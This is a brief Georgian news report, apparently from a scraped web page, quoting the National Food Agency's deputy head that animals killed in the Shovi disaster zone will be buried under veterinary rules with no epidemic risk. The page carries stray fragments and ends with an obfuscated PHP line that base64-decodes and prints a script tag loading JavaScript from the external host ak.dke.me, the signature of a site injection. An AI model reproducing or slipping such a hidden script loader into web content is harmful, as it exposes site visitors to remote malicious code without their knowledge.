celsiusi
ავერსი შნაიდერი

სურსათის ეროვნულ სააგენტოში აცხადებენ, რომ შოვში, სტიქიის ზონაში გამორიყული ცხოველების დამარხვა სრული წესების დაცვით მოხდება.

როგორც სურსათის ეროვნული სააგენტოს ხელმძღვანელის მოადგილე ვასილ ბასილაძემ აღნიშნა, ეპიდემიის გავრცელების არანაირი საფრთხე არ არსებობს.

„სურსათის ეროვნული სააგენტო მუდმივ კოორდინაციაშია სალიკვიდაციო სამუშაოებში ჩართულ სტრუქტურებთან და სამსახურებთან. ცალსახად შეიძლება ითქვას, რომ რაიმე ეპიდემიის გავრცელების არანაირი საფრთხე ან რისკი არ არსებობს. დაღუპული ცხოველების დამარხვა სრული ვეტერინარული წესების დაცვით და ადგილობრივ თვითმმართველობასთან ერთად მოხდება. საჭიროების შემთხვევაში, სააგენტო სადეზინფექციო სამუშაოებს ჩაატარებს. სურსათის ეროვნული სააგენტო, როგორც ზედამხედველი ორგანო, ჩართულია ადგილობრივ თვითმმართველობასთან ერთად და ზედამხედველობას გაუწევს, რომ გამორიყული ცხოველები სრული წესების დაცვით დაიმარხოს“, – განაცხადა ვასილ ბასილაძემ.

269
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");